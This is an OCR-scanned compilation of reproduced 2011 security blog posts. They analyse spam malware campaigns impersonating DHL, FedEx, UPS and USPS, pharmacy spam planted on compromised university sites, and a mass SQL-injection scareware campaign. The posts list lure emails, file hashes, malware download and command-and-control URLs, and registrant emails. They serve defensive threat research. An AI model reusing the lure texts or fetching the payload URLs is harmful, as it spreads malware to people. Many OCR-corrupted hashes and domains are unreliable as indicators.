fault admin@money-mule-recruitment domain type of structure. Monitoring of their money 
mule recruitment activities is ongoing. 


Related posts: 

[17]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[18]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[19]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[20]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[21]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[22]Money Mule Recruiters on Yahoo!’s Web Hosting 

[23]Dissecting an Ongoing Money Mule Recruitment Campaign 
[24]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[25]Keeping Reshipping Mule Recruiters on a Short Leash 


[26]Keeping Money Mule Recruiters on a Short Leash 
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[27]Standardizing the Money Mule Recruitment Process 
[28]Inside a Money Laundering Group’s Spamming Operations 
[29]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


[30]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [31]Dancho Danchev’s blog. 
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7.3.4 Spamvertised DHL Notification Malware Campaign (2011-03-10 15:29) 


[1] 


A currently spamvertised malware campaign is brand-jacking DHL for malware-serving pur- 
poses. 


Sample filename: document.zip => DHL _notification.exe 

Sample message: Dear customer. The parcel was send your home address. And it will 
arrice within 7 bussness day. More information and the tracking number are attached in doc- 
ument below. Thank you. 2011 DHL International GMDH. All rights reserverd - notice the typo. 


DHL _notification.exe - [2]Trojan-Spy.Win32.SpyEyes - Result: 27 /43 (62.8 %) 

MD5 : bda72e57d263241d52b1fe2ef014cba9 

SHA1 : fa9dc14b100f1bf5124cd23c322c109b38a70675 

SHA256: 199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c914aledd69a02e3f8a70 


Upon execution phones back to: 

adobe.com/geo/productid.php 

elsoplongt.com/rk’,jopbh/qwg - Email: redaccion@elsoplongt.com 
accuratefiles.com/rk‘,jopbh/qwq 

lulango.com/rk’,jopbh/qwgq - Email: lulango@gmail.com 
erherg34gsafwe.com/xgate.php - AS49469, Email: admin@erherg34gsafwe.com 
- erherg34gsafwe.com/ftp/base.bin 

- erherg34gsafwe.com/ftp/ftpplug2.dll 

- erherg34gsafwe.com/ftp/base.bin 


Domains responding to: 
192.150.16.117 
72.41.115.170 
74.117.180.216 
87.106.193.21 
94.63.244.56 


This post has been reproduced from [3]Dancho Danchev’s blog. 


1. https: //1h5.googleusercontent . com/-tTD9sG3CmGk/TXj NsW5Pb4I / AAAAAAAAE2Y/Hgeyhj QWhBo/s1600/dh1 . jpg 
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a02e3f8a70- 1299762101 
3. http://ddanchev.blogspot.com/ 
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7.3.5 Compromised University Leads to Fraudulent Pharmaceutical Ads 
(2011-03-10 16:53) 


[1] 


RUTGERS Senne 


. 
Mathematics 
Find People For Faculty & Statt For Alumni & Friends Events & Seminars News Find Jobs Reseatch Math Links LSS] 


Horne > Mdnews Printable Version & 


Online We accept ia WIRE *eceoOen Webmail 


Pharmacy anes 


Directions 


Computing Support 


Products 


Cialis 


fog TADALAFIL (Cialis) is the only drug that combines the two mc 


OTHER DRUGS characteristics of an erectile dysfunction 
3 More Details 


. PROPECIA 
~~ Price per pill: $1.53 
CASODEX 
Add To Cart 


Continuing the [2]Compromised University Leads to Fraudulent Google Brand-jacked Phar- 
maceutical Ads series, yet another university has been compromised by pharmaceutical 
scammers, [3]part of an affiliate network. 


In this very latest example of this tactic, seeking to abuse the high pagerank of the web 
site in question, the web site of the Department of Mathematics at Rutgers University 
(math.rutgers.edu/mdnews/) appears to have been compromised by pharmaceutical scam- 
mers. 


Included URLs: 
math.rutgers.edu/mdnews/levitraline.html 
math.rutgers.edu/mdnews/levitrastory. html 
math.rutgers.edu/mdnews/cialis-pills.html 
math.rutgers.edu/mdnews/levitradosage.html 
math.rutgers.edu/mdnews/viagra-buy-online.html 


[4] 
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= = ** No Presogtion Required ** Viegs Just for $1.’ 


Home Bestsellers All Products AQ Comact Us 


BNQe You to find o price even same os us 


World Select 


Product Categories 


4 ( Free Shipping 


FABCDEFGHIJKLMNOP 
ORSTUVWXKYZ 
Today's Bestsellers: 
o 
aL Viagra te Cialis oe Levitra & 
° 5 


Redirects to: 
worldselectshop.com/?id=abamos - 95.211.1.82 - Email: worldselectshop.com@protecteddomainser\ 
ces.com 


The same affiliate ID is also active at: 
usadrugstorenow.com/products/diflucan.htm?id=abamos_~ - 212.117.185.119 - Email: 
usadrugstorenow.com@protecteddomainservices.com 


This post has been reproduced from [5]Dancho Danchev’s blog. 


1. 
2. 

3. http://www.zdnet.com/blog/security/inside-an-affiliate-spam-program-for-pharmaceuticals/2054 

4. 
5. 


7.3.6 More Spamvertised DHL Notifications Spread Malware (2011-03-11 15:31) 


[1] 
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Yesterday’s campaign is still ongoing, with new MD5’s in the wild. Here are the details. 


Sample subjects: DHL notification #random number 

Sample message: Dear customer! The parcel was send your home address. And it will arrice 
within 7 bussness day. More information and the tracking number are attached in document 
below. Thank you. 2011 DHL International GmbH. All rights reserverd. 

Sample filenames: DHL _tracking.zip; doc.zip 


doc.exe - [2]Trojan-Spy.SpyEy!IK - Result: 18/ 43 (41.9 %) 

MD5: 83db662187dd7cd58fc4a368ea27775d 

SHA1 : 4edb2d95c0570a36f6cb992e55111cdd7c3eda69 

SHA256: 99fle003bbf1025b0bbe257ece65d1704852fd1lba48e6cc79bd39cde6e6d14c3 


DHL _tracking.exe - [3]Win-Trojan/Spyeyes.45568 - Result: 29/ 43 (67.4 %) 

MD5 : 81fc09b014617bce59f678374b486512 

SHAI1 : 3d92a768f58b2900b98c9f97ce2753d27a4749ae 

SHA256: 24b23bf7ebd03bf5feb0c637eale64661e27c78c66684dd49f074af2b2505bb7 


Upon execution phones back to: 

adobe.com/geo/productid.php 

elsoplongt.com/rk’ ,jopbh/qwgq - Email: redaccion@elsoplongt.com 
accuratefiles.com/rk‘,jopbh/qwq 

lulango.com/rk’‘,jopbh/qwgq - Email: lulango@gmail.com 
erherg34gsafwe.com/xgate.php - AS49469, Email: admin@erherg34gsafwe.com 
- erherg34gsafwe.com/ftp/base.bin 

- erherg34gsafwe.com/ftp/ftpplug2.dll 

- erherg34gsafwe.com/ftp/base.bin 


Domains responding to: 
192.150.16.117 
72.41.115.170 
74.117.180.216 
87.106.193.21 
94.63.244.56 


Additional malicious activity within AS49469 (SA-NOVA-TELECOM-GRUP-SRL Sa Nova Tele- 
com Grup SRL, courtesy of the [4]ZeusTracker and the [5]SpyEye Tracker: 


bigupdate.ru - Email: admin@hotupdaters.ru 
bigupdatings.ru - Email: admin@bigupdatings.ru 
bigupdater.ru - Email: admin@bigupdater.ru 

bigupdates.ru - Email: admin@istuplenie.ru 

bigupdating.ru - Email: admin@bigupdating.ru 
bigupdaters.ru - Email: admin@bigupdaters.ru 
94.63.244.30 

metamphcrystal.com - Email: admin@metamphcrystal.com 


Related malware-serving domains within AS49469, SA-NOVA-TELECOM-GRUP-SRL Sa Nova 
Telecom Grup SRL 
xppclapgirl.com - 89.114.9.33 
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natnatraoi.com - 12.211.117.127 - Email: barbarasorber@yahoo.com 
d34ghqarfrgad.com - 94.63.244.56 - Email: admin@d34ghqarfrgad.com 
g3u4g.net - 89.114.9.33 - Email: G3U4G.NET@domainservice.com 
suhi4hnnet - 89.114.9.60 - Email: SUHI4HR.NET@domainservice.com 
mialedot.ru - 94.63.244.44 - Email: abuse@mialedot.ru 
blackmemoso.com - Email: grasp@yourisp.ru 


This post has been reproduced from [6]Dancho Danchev’s blog. 


1. https: //1h6.googleusercontent .com/-1Xn7bIY3uP4/TXoZKEOrU4I / AAAAAAAAE2k/ JaxEcm5V1vM/s1600/dh1. jpg 


2. http://www.virustotal.com/file-scan/report .html?id=99f 1e003bbf 1025b0bbe257ece65d170485 2f d1ba48e6cc79bd39c 


de6e6d14c3- 1299847 160MD5/%20%20/20 


3. http://www.virustotal.com/file-scan/report .html?id=24b23bf 7ebd03bf 5f eb0c637ea1e64661e27c78c66684dd49Ff 074a 


£2b2505bb7- 129984716 
4. https: //zeustracker.abuse.ch/monitor. php?as=49469 


5. https://spyeyetracker.abuse.ch/monitor .php?as=49469&f ilter=online 


6. http: //ddanchev.blogspot.com/ 


7.3.7 Spamvertised FedEx Notifications Spread Malware (2011-03-16 18:14) 


[1] 


® 


A currently ongoing spamvertised campaign is brand-jacking FedEx for malware serving 
purposes. 


Sample attachments: FedEx letter.zip; FedEx letter.exe 

Sample subject: FedEx notification #random number 

Sample message: Dear customer. The parcel was sent your home address. And it will arrive 
within 7 business day. More information and the tracking number are attached in document 
below. 


Thank you. 
© FedEx 1995-2011 


Detection rate: FedEx letter.exe - [2]Trojan.FakeAV - Result: 24/ 43 (55.8 %) 
MD5 : 90bef5dff5809682249813fd63b67da4 
SHA1 : 2418c01a30a19a2d76b693474a852092e3de4a32 
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SHA256: a38848786528d235b51fed3adf20050f5c1906d066e0282311b8bce37d8163a0 


Phones back to AS30890 (EVOLVA Evolva Telecom s.r.l.) 
94,63.244.56/lol2.exe 
94.63.244.56/pod.exe 


with 94.63.244.56/allftp.txt; 94.63.244.56/ftp/db _grab.txt hosting the sniffed FIP cre- 
dentials. 


Responding to 94.63.244.56 are d34ghqarfrgad.com and erherg34gsafwe.com, phone 
back URLs which we've seen from last week’s spamvertised DHL Notifications campaigns, with 
the use of the IP best described as a desperate attempt to maintain a C &C infrastructure: 


¢ [3]Spamvertised DHL Notification Malware Campaign 


¢ [4]More Spamvertised DHL Notifications Spread Malware 


This post has been reproduced from [5]Dancho Danchev’s blog. 


1 
2 
3. http: //ddanchev. blogspot .com/2011/03/spamvertised-dhl-notificication-malware.htm 

‘ 

5. 


7.3.8 Compromised Universities Leads to Fraudulent Pharmaceutical Ads 
(2011-03-16 19:30) 


[1] 
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G3 CANADIAN .COM 


@& CALLFREENOW! +1(866)9315170 


10% DISCOUNT FOR ALL 
SUBSEQUENT ORDERS 


Special Offer ED Trial PACK a” | Cialis = Viagra = 


— 


GET FREE SAMPLE PILLS OP 2vacraris <4 

IRDERING ANY PROOUX T - , 

2 FREE VIAGRA PRLS 2 CIALIS PLLS ee I20PRLS-20MG | 120 PRLS - 100 MG 
AND 


© THE ORDER EXCEEDS $200 
2 Lavir 
4 FREE VIAGRA + 2 CIALIS PLLS LETRA PRLS 


i 


® CATEGORIES $3 TODAY'S BESTSELLERS 


BESTSELLERS 


Viagra Cialis 
ALLERGIES 
ANTI DEPRESSANTS > 
ANTI FUNGAL 
ANTIVIRAL 

Viagra 15 an oral drug frat is used to Cialis 15 2 POES intetttor Prat ts 
ANTIBIOTICS cure erectie dysfunction in men The used to cure ED of enpotence in 
ANTICONVULSANT Grug helps men gan and sustain an men 

OfOCBON UPON Sema SErMLIBON 
ANTIDIABETIC 

Only. €0.58 Only €0.83 
ANXIETY 

© Avo ro cant © aco ro cant 


ARTHRITIS 
ASTHMA 
BARTH CONTROL 


Levitra Viagra Soft 
BLOOD PRESSURE 
CANCER 
CARDIOVASCULAR 
CHOLESTEROL 
Levita is an oral Grug Prerapy Matis Viagra Sot is used to reat ED in 
OOURETICS Used for He Teatnert of erectle men Viagra ncreases Me body's 


Oysiunchon in men abdity tO acteeve afd maentaen an 


GASTROINTESTINAL 


Continuing the "[2]Compromised University Leads to Fraudulent Pharmaceutical Ads’; 
"[3]Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads" 
series, in this post we’ll discuss two more compromised web servers of educational institutions 
leading to pharmaceutical ads. Affected Universities are: 


Rutgets Energy Institute: 
ruei.rutgers.edu/documents/chin.php?adv=cialis20-mg 
ruei.rutgers.edu/documents/chin.php?adv=viagra-ratings 
ruei.rutgers.edu/documents/chin.php?adv=viagra-999 
ruei.rutgers.edu/documents/chin. php?adv=viagra-expired 
ruei.rutgers.edu/documents/chin.php?adv=viagra-kako-se 


Uploaded redirectors: 
ruei.rutgers.edu/documents/chin.php 
ruei.rutgers.edu/documents/roar.php 
ruei.rutgers.edu/documents/ost.php 


Computer Music Center at Columbia University 
music.columbia.edu/cmc/pills/index.php?adv=how-to-try-viagra 
music.columbia.edu/cmc/pills/index.php?adv=damaskviagra 
music.columbia.edu/cmc/pills/index.php?adv=brandlevitra 
music.columbia.edu/cmc/pills/index.php?adv=vegetalviagra 
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music.columbia.edu/cmc/pills/index. php?adv=vviagra 


[4] 


europharmas.com Language: (GI Engin 


o ' o1 S77 753.3148 0.00 (0 ems 
|. 44203 514 1638 WF Cnecicut 


TRY OUR ED PACK 
_ Vow © Cialis © leview 


HOME ORDER STATUS FAQ CONTACT US TESTIMONIALS 
Categories List Bestueliers 


, Cialis Cialis 
. oe LD am) Professional Testimonials 
* Anti Fungal 


leceete | poetete 
» Ant Vee Johnny,34 


$1.31 $3.65 
Artens 
* , 
sthene Cipro Clomid Stephen Seth 
Earth Conmrot 
* Blood Pressure Cpe Momacen Cheng 
Cancer 
Cardowescutar 
Chetesterct 
. 220 
eewers $0.71 $0.53 a 
» Curescs 
Secial bookmarks 
* Erecate Dystuncton Diflucan 


Female Viagra 
‘— 2 » 


* Garo Hem Flam cre tome Sorrel Cor ate 


Cone at Ah nt 


The sampled URLs redirect to the following fraudulent pharmaceutical sites: 
pillsedonline.com - 93.170.104.53 - Email: stavros1929@hotmail.com; 
mos@yahoo.com 

buyperfecthealth.com - 93.170.104.53 - Email: stavros1929@hotmail.com 
safedrugstock.com - 93.170.104.53 - Email: stavros1929@hotmail.com 
securedrugstock.com - 93.170.104.53 - Email: stavros1929@hotmail.com 
europharmas.com - 93.170.104.53 - Email: glockner546@hotmail.com 
requestpills.com - 93.170.104.53 - Email: stavros1929@hotmail.com; 
mos@yahoo.com 

online-doc.us - 93.170.104.53 - Email: cool _gamer90@mail.ru 
pills4sex.eu - 93.170.104.53 

securetablets.com - 93.170.104.53 - Email: stavros1929@hotmail.com 
alledtablets.com - 93.170.104.53 - Email: stavros1929@hotmail.com; 
mos@yahoo.com 


stavroscomodro- 


stavroscomodro- 


stavroscomodro- 


canadian-refills.com - 178.239.60.214 - Email: privacy-829911@domainprivacygroup.com 


Cybercriminals continue purchasing web shells/and stolen FTP credentials to high page 
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rank-ed web sites such as educational institutions. Monitoring of their operations will continue. 


This post has been reproduced from [5]Dancho Danchev’s blog. 


1. 
2. http: //ddanchev. blogspot .com/2011/03/compromised-university-leads-to_10.htm 

3. 

4. 
5. 


7.3.9 Spamvertised United Parcel Service notifications serve malware 
(2011-03-23 15:54) 


A currently ongoing spam campaign is impersonating UPS for malware-serving purposes. 


Sample subject: United Parcel Service notification 
Sample attachments: UPSnotify.rar; UPSnotify.exe; UnitedParcelServicedocument.exe 
Sample message: Dear customer. 


The parcel was sent your home address. And it will arrive within 7 business day. More 


information and the tracking number are attached in document below. Thank you. © 1994- 
2011 United Parcel Service of America, Inc. 
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Detection rates: 


UnitedParcelServicedocument.exe - [2]Mal/Bredo-K - Result: 7/ 41 (17.1 %) 

MD5 : b60e95b42106989bc39e175efccO31db 

SHA1 : Ofb63dff83db643c9ee42efe617bdd539a5ffo8f 

SHA256: 65f14438c3154a74767131a427fbdc50c28a6cbcdcf47f3d418b92c4c168696a 


UPS notify.exe - [3]Mal/Bredo-K - Result: 17/ 40 (42.5 %) 

MD5 : cc040e69121bc19f23ef4a32dbb8a80e 

SHAI1 : da65b7b277540b88918076949a28e8307ad7e41la 

SHA256: ef5f76e1b20c2083469fbe7e4de4ec9c06689ee105274b1a79c9cadbd23d54ae 


Upon execution downloads additional binaries from: 
193.105.121.33/lol2.exe 
193.105.121.33/pod.exe 
193.105.121.33/spm.exe 


Responding to 193.105.121.33 are undeardarling.com - Email: admin@undearhappydear.com 
and undearhappydear.com - Email: admin@undearhappydear.com 


Detection rates: 

lol2.exe - [4]Trojan.FakeAV!gen39- Result: 14/ 43 (32.6 %) 

MD5: 747431a2a4a29flbfc136e674af99ad0 

SHA1 : 8349fc3f5f299d0ca6473e748276ec2b50019330 

SHA256: 6009e7f5cbc55e6acb060d9fb33a39a978168a32a0a8C6a24f201106056ccOdb 


pod.exe - [5]Backdoor.Win32.Gbot!IK - Result: 33/ 42 (78.6 %) 

MD5: f403afdbe4c4c859c8ab018a7ded694c 

SHA1 : 1915a46cbb43fcaf8da90af95856d7524b24f129 

SHA256: eddfff99df316669191be0b61a5ae06ee811bbd27110111e69cbd212881fa494 


Upon execution phones back to: 

healthylifenow.com - 208.109.223.193 - Email: HEALTHYLIFENOW.COM@domainsbyproxy.com 
bigbeerclubonline.com - Email: contact@privacyprotect.org 

zonetf.com - 96.9.169.85 - Email: janeob@126.com 


spm.exe - [6]W32.Pilleuz - 10/ 42 (23.8 %) 

MD5 : de55498b9f9195f1733df62c7026cf5f 

SHAI1 : 5520c1220cdd03a64f9b782c2393697ebab154b9 

SHA256: dc2a797e5be968f9d36d4510988fa242c042a3e315fb50a3f9325cae6ald779d 


Upon execution phones back to: 

ponel.biz - 46.4.62.17 - Email: web _raskrutka@pochta.ru 

itisformebaby.biz - 46.4.10.7; 88.198.46.151; 178.63.63.208 - Email: web 
_raskrutka@pochta.ru 

gmail.com 

yahoo.com 

hotmail.com 


As speculated, cybercriminals have started feeding legitimate sites into their C &C com- 
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munication patterns in an attempt to undermine community efforts aimed at tracking their 
malicious activities. 


Related posts: 

[7]Spamvertised FedEx Notifications Spread Malware 
[8]Spamvertised DHL Notification Malware Campaign 
[9]More Spamvertised DHL Notifications Spread Malware 


This post has been reproduced from [10]Dancho Danchev’s blog. 


. https://1h3.googleusercontent . com/-OgqZi8-v jHU/TYn2AwAWSs6I / AAAAAAAAE20/Ct8GpwYkPkU/s1600/ups- logo. jpg 


dbd23d54ae- 1300884778 
4. ttp://www.virustotal .com/file-scan/report .html?id=6009e7f 5cbc55e6acb060d9f b33a39a97 8168a32a0a8c6a24F 2011 
06056ccOdb- 1300884822 


. http: //ddanchev.blogspot .com/2011/03/more-spamvertised-dhl-notifications .htm 


10. http://ddanchev. blogspot .com/ 


7.3.10 Spamvertised Post Office Express Mail (USPS) Emails Serving Malware 
(2011-03-25 18:20) 


[1] 


UNITED STATES 
POSTAL SERVICE... 
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A currently spamvertised malware campaign is impersonating the USPS for malware-serving 
purposes. 


Sample subject: Post Express Information. Your package is available for pick up. NR[random 
number] 

Sample attachment: Post Express Label ID [random number].zip; Post Express Label.exe 
Sample message: 

Dear client, Email notice number.[random number]. Your package has been returned to the 
Post Express office. The reason of the return is "Error in the delivery address" Important 
message! Attached to the letter mailing label contains the details of the package delivery. 
You have to print mailing label, and come in the Post Express office in order to receive the 
packages! Thank you for using our services. Post Express Support. 


Detection rate: 

Post Express Label.exe - [2]Medium Risk Malware Dropper - Result: 1/ 41 (2.4 %) 
MD5 : 3cO5dd68ee0bfb9b290b9c034f836833 

SHA1 : 8ala00da04c96c8e67b9921652de60463118ea9f 

SHA256: 57d58165c79158a42c3e45670aa4176aaae393f371188f91d0ac46022bd3e7c0 


[3] 
Post Express Service 


“~ 
Details of delivery parcels 


Tithe Datel Data2 Data’ 


Aeght 

Length 66 
Qualty 57 6 463 
Total weight 333 6m 


Amount ts a 53 
Total weight rs 86 


Source: Data for parcels 


Upon execution phones back to: 
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mialepromo.ru/7Pe8ORolxs/document.doc 
mialepromo.ru/7Pe8ORolxs/load.php?file=0 
mialepromo.ru/7Pe8ORolxs/load.php?file=1 
mialepromo.ru/7Pe8ORolxs/load.php?file=2 
mialepromo.ru/7Pe8ORolxs/load.php?file=3 
mialepromo.ru/7Pe8ORolxs/load.php?file=4 
mialepromo.ru/7Pe8ORolxs/load.php?file=5 
mialepromo.ru/7Pe8ORolxs/load.php?file=6 
mialepromo.ru/7Pe8ORolxs/load.php?file=7 
mialepromo.ru/7Pe8ORolxs/load.php?file=8 
mialepromo.ru/7Pe8ORolxs/load.php?file=9 
mialepromo.ru/7Pe8ORolxs/load.php?file=uploader 
mialepromo.ru/7Pe8ORolxs/load.php?file=grabbers 


mialepromo.ru - 89.208.149.204 (AS12695); 109.94.220.51 (AS47860); 109.94.220.50 
(AS47860); 91.199.75.77 (AS44301) 178.17.164.131 (AS43289) 193.22.81.104 (AS28920) - 
Email: salam@ica.org 


Monitoring of the campaign is ongoing. 


Related posts: 

[4]Spamvertised United Parcel Service notifications serve malware 
[5]Spamvertised FedEx Notifications Spread Malware 
[6]Spamvertised DHL Notification Malware Campaign 

[7]More Spamvertised DHL Notifications Spread Malware 


This post has been reproduced from [8]Dancho Danchev’s blog. 


1. https://1h5.googleusercontent .com/-4h7r9aeCojo/TYy3ERI7QcI/AAAAAAAAE24/mqvia0IFgSY/s1600/usps-uspostalser 


N 


ttp://www.virustotal.com/file-scan/report .html?id=57d58165c79158a42c3e45670aa4176aaae393£371188f91d0ac46 


3, https: //i, goog1eusercontent.con/~ChiqB1tEGFU/Ty_-WJGbyi/AAAAAAAAE2S /wSFPcktvcllh/s1600/post_express_serd 
ice.PN 


E 


ttp://ddanchev. blogspot .com/2011/03/more-spamvertised-dhl-notifications.htm 
ttp://ddanchev.blogspot.com/ 


4. 
5. 
6. http: //ddanchev. blogspot .com/2011/03/spamvertised-dhl-notificication-malware.htm 
7. 
8. 
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7.3.11 Dissecting the Massive SQL _ Injection Attack Serving Scareware 
(2011-03-31 19:54) 


Potential threat details 


Microsoft Security Essentials detected potential threats that might compromise your privacy or damage your 
computer. Your access to these items may be suspended until you take an action. Click ‘Show details’ to learn 
more, 


Detected items 4lert level Recommendation Status 
© Unknown Win32/Trojan Severe Remove Suspended 


Category: Trojan 
Description: This program is dangerous and execute commands from an attacker. 


Recommendation: Remove this software immediately. 


Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer, 
You can still access the files that these programs use without removing them (not recommended), To access 
these files, select the 'Clean computer’ action and click ‘Apply action’. IF this option is not available, 

log on as administrator or ask the local administrator for help. 


Items: 
C:windows\system32\cmd.exe 


Clean computer | Apply actions | Close | 


A currently ongoing massive SQL injection attack has affected hundreds of thousands of web 
pages across the Web, to ultimately monetize the campaign through a scareware affiliate 
program. Such massive SQL injection attempts are usually conducted using [1]mass vulnera- 
bility scanning tools, with the help of [2]search engines which have already [3]crawled the 
vulnerable sites. 


What’s particularly interesting about this campaign, is the fact that the used domains 
are all responding to the same IPs, including the portfolios of scareware domains, which the 
cybercriminals naturally rotate on a periodic basis. Let’s dissect the campaign, expose the 
domain portfolios and the entire campaign structure. 


UPDATED: Related SQL injected URLs [4]courtsesy of WebSense: 
online-stats201.info/ur.php - Email: tikOO066@gmail.com 
stats-master111.info/ur.php - Email: tikO066@gmail.com 
agasi-story.info/ur.php - 91.217.162.45 - Email: tikO066@gmail.com 
general-st.info/ur.php - Email: tikO066@gmail.com 
extra-service.info/ur.php - Email: tikO0O66@gmail.com 
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sol-stats.info/ur.php - Email: tikO0O66@gmail.com 
google-stats49.info/ur.php - Email: tikOO66@gmail.com 
google-stats45.info/ur.php - Email: tikOO66@gmail.com 
google-stats50.info/ur.php - Email: tikO066@gmail.com 
google-server43.info/ur.php - Email: tikOO066@gmail.com 
stats-master88.info/ur.php - Email: tikOQO66@gmail.com 
eva-marine.info/ur.php - 109.236.81.28 - Email: tikOO66@gmail.com 
stats-master99.info/ur.php - Email: tikOQO66@gmail.com 
tzv-stats.info/ur.php - Email: tikO066@gmail.com 
milapop.com/ur.php - Email: jamesnorthone@hotmailbox.com 


SQL injected URLs: 

lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 
95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com 

alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com 
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com 
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com 
t6ryt56.info/ur.php (18 results) - Email: support@ruler-domains.com 

tadygus.com/ur.php (100 results) - Email: jamesnorthone@hotmailbox.com 
worid-of-books.com/ur.php (334,000 results) - Email: tikOO66@gmail.com 


[ System Tasks System scan progress 
[2) View system information (i - oS 
BS Add or « programs @: ag * eae 
GB Change a settings = 
Nard drives 
Other Places = - 
wd Local Disk (C;) . Local Disk (D:) 
€Q My Network Places @ 34 worms @ 17 trojans 
&) My Documents pvp 
( Shared Documents 
> Control Panel () 
Poa 5 OVD-RAM Drive (E:) 
COLECECEEL EE LEE 
Now scanning: nnensryc.exe 
‘Your Computer is Infected! 
Name Risk level Date Files fected Rae 
@ Email-Worm.Win32.Net Critical 24 APR 2010 42 Waiting removal 
@ Email-Worm.win32.Myd Critical 26 OCT 2010 20 Waiting removal 
@ 1Trj-Dwnlde.win Critical FEB 37 Watting removal 
Description: - 
This program is potertially dangerous for your system. Trojan-Downloader stealing passwords, credit cards and other personal £ 
information from your computer, 
Advice: 


You need to remove this threst as soon 5 possible! 


Upon successful redirection, the campaign attempts to load the scareware domains defender- 
nibea.in/scan1b/237 - 46.252.130.200 - Email: jimwei2969@gmail.com 


Detection rate: 
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freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/ 41 (22.0 %) 

MD5 : 815d77f8fca509ddelabeafabed30b65 

SHA1 : 1b3c35afb76c53cd950/7fffee46fb58c29e72bc1 

SHA256: cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c 


Responding to 46.252.130.200 (AS25190; KIS-AS UAB "Kauno Interneto Sistemos") are also: 
antivirus-1091.co.cc 

antivirus-1574.co.cc 

antivirus-2051.co.cc 

antivirus-2525.co.cc 

antivirus-2932.co.cc 

antivirus-3654.co.cc 

antivirus-3833.co.cc 

antivirus-4063.co.cc 

antivirus-418.co.cc 

antivirus-4303.co.cc 

antivirus-4749.co.cc 

antivirus-495.co.cc 

antivirus-5216.co.cc 

antivirus-5676.co.cc 

antivirus-5802.co.cc 

antivirus-6437.co.cc 

antivirus-6703.co.cc 

antivirus-7081.co.cc 

antivirus-713.co.cc 

antivirus-728.co.cc 

antivirus-7357.co.cc 

antivirus-8072.co.cc 

antivirus-9009.co.cc 

antivirus-9638.co.cc 

antivirus-9667.co.cc 

defender-aabv.in - Email: leonflanagan7681@gmail.com 
defender-aqeu.co.cc 

defender-asng.co.cc 

defender-atio.in - Email: terriduverger3239@gmail.com 
defender-atxo.in - Email: celineiebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-bwuy.co.cc 

defender-cron.in - Email: lisasuresh9147@gmail.com 
defender-ddbr.in - Email: selenajohansson9195@gmail.com 
defender-dteo.in - Email: giovannaraggio5417@gmail.com 
defender-eahy.co.cc 

defender-eklq.in - Email: sebastiensheppard8680@gmail.com 
defender-endl.in - Email: adamgaylard1113@gmail.com 
defender-ewum.co.cc 

defender-eyde.co.cc 

defender-fmof.in - Email: kamillamartinl237@gmail.com 
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defender-fola.co.cc 

defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
defender-hipw.in - Email: angiejohansen9730@gmail.com 
defender-hjlk.in - Email: jennwrayford2124@gmail.com 
defender-hmfu.in - Email: lynnbone8026@gmail.com 
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com 
defender-htlu.in - Email: jerihamann4163@gmail.com 
defender-iibk.co.cc 

defender-iies.co.cc 

defender-iksl.in - Email: amarasanders9974@gmail.com 


antivirl.mooo.com 
antivirus-2932.co.cc 
defender-ayva.co.cc 
defender-qotg.in 
defender-uvag.in 
defender-vqqn.in 
defender-wrhw.in S NET yy 46.252.130.0/23 ——AS-ge 4s25190 
exirzexl.co.cc 
mxddtipp.co.cc 
pzecsfas.co.cc 
system-scanner-iwew.co.cc 
Zipeqbhp.co.cc 
zivtwiwl.co.ce 
defender-isde.co.cc 
defender-iyrc.co.cc 
defender-jgnl.in - Email: caseyalzen3316@gmail.com 


defender-jihv.co.cc 
defender-keod.in - Email: khashayarbirss4814@gmail.com 
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defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-kzwu.co.cc 

defender-labm.in - Email: gregorybradford1520@gmail.com 
defender-Icoh.in - Email: timothythomas6924@gmail.com 
defender-nhei.co.cc 

defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-ojbr.in - Email: fucknielsen8675@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-pakc.in - Email: sabrinawheelock7642@gmail.com 
defender-ppdw.in - Email: divinakempton5670@gmail.com 
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com 
defender-qotg.in - Email: franchescaili9704@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 
defender-qsko.co.cc 

defender-qumf.in - Email: carlaadams@gmail.com 
defender-rlag.in - Email: carmichaelmail@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-thga.in - Email: youngantonio6055@gmail.com 
defender-ueuv.co.cc 

defender-uqko.in - Email: christinakaaikati5574@gmail.com 
defender-vflq.in - Email: terriacuna2081@gmail.com 
defender-vimj.in - Email: lauriefreeman9930@gmail.com 
defender-vqqn.in - Email: chrissames4421@gmail.com 
defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-wkiw.in - Email: otisvaladez7778@gmail.com 
defender-waga.in - Email: christodoulosglidden8856@gmail.com 
defender-wrhw.in - Email: bradsureshl1406@gmail.com 
defender-wtlIn.co.cc 

defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 
defender-ykym.co.cc 

movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 
movies-live-tube-jeyq.co.cc 

movie-tkhk.in - Email: terrymeallyl1288@gmail.com 
movie-tube-beym.co.cc 

movie-tube-juie.co.cc 

movie-ueep.in - Email: celinekevin6179@gmail.com 
movieway2011.com - Email: contact@privacyprotect.org 
